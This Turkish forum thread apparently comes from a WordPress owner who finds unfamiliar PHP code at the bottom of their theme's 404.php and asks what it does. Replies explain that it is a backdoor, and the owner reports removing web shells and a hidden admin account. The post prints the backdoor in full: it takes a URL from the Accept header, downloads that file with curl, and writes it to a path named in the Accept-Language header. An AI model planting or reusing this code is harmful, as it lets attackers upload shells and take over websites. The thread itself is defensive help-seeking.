Arama butonu
Bu konudaki kullanıcılar: 1 misafir
4
Cevap
877
Tıklama
0
Öne Çıkarma
Wordpress 404.php de bu kodu buldum Hacklendim galiba
B
10 yıl
Yüzbaşı
Konu Sahibi

Merhaba,

wordpress blogumun 404.php sinin en altında

quote:

<?php

$ur = $_SERVER['HTTP_ACCEPT'];

$f = $_SERVER['HTTP_ACCEPT_LANGUAGE'];

if (preg_match('/http/i', $ur)) {

$ch = curl_init($ur);

$fp = fopen($f, "w");

curl_setopt($ch, CURLOPT_FILE, $fp);

curl_setopt($ch, CURLOPT_HEADER, 0);

curl_exec($ch); curl_close($ch);fclose($fp);

}

?>


bu konu buldum. Nedir bu acaba ? Ne işlev yapar ?

DH forumlarında vakit geçirmekten keyif alıyor gibisin ancak giriş yapmadığını görüyoruz.

Üye olduğunda özel mesaj gönderebilir, beğendiğin konuları favorilerine ekleyip takibe alabilir ve daha önce gezdiğin konulara hızlıca erişebilirsin.

Üye Ol Şimdi Değil



O
10 yıl
Teğmen

HTTP_ACCEPT içerinde http ile başlayan bir şey varsa onu alıp dizine kaydediyor. Büyük ihtimalle shell yüklemek içindir.



B
10 yıl
Yüzbaşı
Konu Sahibi

üstad dizinde 2 tane shell dosyası buldum ve mysql user table da admin yetkileri verilmiş kullanıcı buldum (panelde gözükmüyordu). bunları temizledim. acaba bu http_accept dedigin şey nedir. Bu dizine yollanan dosyalar nerden geliyor serverda biryerde gizlimidir ?


Bu mesaja 1 cevap geldi.

Bu mesajda bahsedilenler: @overpSkpt
O
10 yıl
Teğmen

$fp = fopen($f, "w"); bunla bir dosyası sana yazdırıyor içinde de başka çekmek istediği dosyalar vardır büyük ihtimal ya da direkt shell atıp onun üzerinden ilerleyebilir.
daha sonra CURL ile de yüklemek istediği dosya işlemine başlıyor.

CURL genelde dosya indirme işlemlerinde ya da bir sayfayı çağırma işlemlerinde kullanılır.


Bu mesaja 1 cevap geldi.
A
10 yıl
Yüzbaşı

curl_init yaptığı url önemli aslında ona baksana $ur variablesine



DH Mobil uygulaması ile devam edin. Mobil tarayıcınız ile mümkün olanların yanı sıra, birçok yeni ve faydalı özelliğe erişin. Gizle ve güncelleme çıkana kadar tekrar gösterme.